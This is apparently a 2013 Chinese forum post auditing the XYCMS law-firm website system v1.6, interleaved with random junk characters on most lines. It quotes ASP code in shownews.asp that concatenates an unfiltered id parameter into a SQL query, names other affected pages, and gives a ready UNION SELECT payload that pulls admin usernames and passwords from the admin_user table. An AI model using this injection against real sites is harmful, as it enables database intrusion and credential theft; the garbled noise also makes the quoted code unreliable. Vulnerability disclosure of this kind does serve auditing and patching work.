前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
7 H; `& v! q n 9 N+ W3 `& {" T, ^" U
淫荡分割线
+ J( M. \) t. b8 b+ l--------------------------------------------------------
Q. y) S# [2 A a
) a, u) ^5 @: S( H审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)! q' E6 P* ^9 E! y0 W
源码地址:http://down.chinaz.com/soft/29233.htm5 V" L7 m3 E- l; q
/ c. n/ D- k5 l5 k* Z
漏洞文件:shownews.asp
' b+ Y* X. H% A1 }+ n' q1 _( y0 i漏洞代码:7-13行
( d& F, y+ ]/ r% q
/ |7 I3 p$ I1 Q& v" F 1 t3 y& ]$ _. y
<% , v5 u2 }6 t% K' V# _/ o6 L% [
id=request.QueryString("id")3 u0 W) D, u4 L0 ^* A( W3 Y
) U- X9 a, a1 I" v/ d' l9 u
set snews=server.createobject("adodb.recordset")
% o! O, t9 S+ F. v, W1 jexec="select * from [news] where id="&id
7 f; A5 n( ]0 j" |/ M& P }: F2 Xsnews.open exec,conn,1,1+ r9 B' ]4 T6 d: S; q
%>' K- E# f- p2 l2 F' t8 T. R
$ g' A, J9 O/ b" I8 t# y" p' u
5 |( w1 x, {+ o什么过滤都没有 直造成注入3 G4 l# I; g& N9 ~; N: t1 C
7 }% I6 M4 T v7 Z* r! l8 j4 C注入点:http://127.0.0.1:99/shownews.asp?id=xx5 T* _' t( N& @ `1 \+ f- K
' v3 u# g2 D$ p" D* K& a: J! ~
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找- N7 v( [0 Q; a5 |
# i- w3 {$ Z1 N9 G- a
t& [. s" S9 _) ^exp: union select 1,admin,password,4,5,7 from admin_user
# ?2 l5 F+ f/ U- I+ e6 [& n
" C* g. P7 j! G# _' @' _ |
发表于 2013-4-4 17:28:12
收藏
支持
反对